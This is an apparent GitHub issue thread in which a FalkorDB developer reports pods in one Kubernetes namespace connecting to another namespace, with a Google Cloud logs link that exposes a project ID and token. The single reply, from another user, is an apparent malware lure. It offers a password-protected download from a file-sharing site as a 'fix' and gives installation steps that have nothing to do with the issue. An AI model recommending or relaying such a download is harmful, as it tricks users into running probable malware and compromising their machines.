### ISSUE TITLE
Nodes trying to connect to nodes in different namespaces

### ISSUE THREAD

**Issue by dudizimber** [FalkorDB/falkordb-omnistrate#102]
https://console.cloud.google.com/logs/query;query=resource.labels.location%3D%22us-central1%22%0Aresource.labels.namespace_name%3D%22instance-186q70moz%22;summaryFields=resource%252Flabels%252Fpod_name:false:32:beginning;cursorTimestamp=2024-08-26T16:44:23.298342702Z;resultsSearch=ac8t806gt;startTime=2024-08-26T15:54:25.200Z;endTime=2024-08-26T16:50:34.800Z?project=app-plane-dev-f7a2434f&rapt=AEjHL4OwEFBRmTiPD-1gnWml5O5CV3PWsH6o6O-i-Z9IWxHiNq3hzxTDNiKFSnZPmFJKFvyItYPiSZjUxDWQO2FLHHOMGmGpeEB_1Ta2EE6Vn5zjuOueKFQ

Namespace `instance-186q70moz` tries to connect to `instance-ac8t806gt`

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
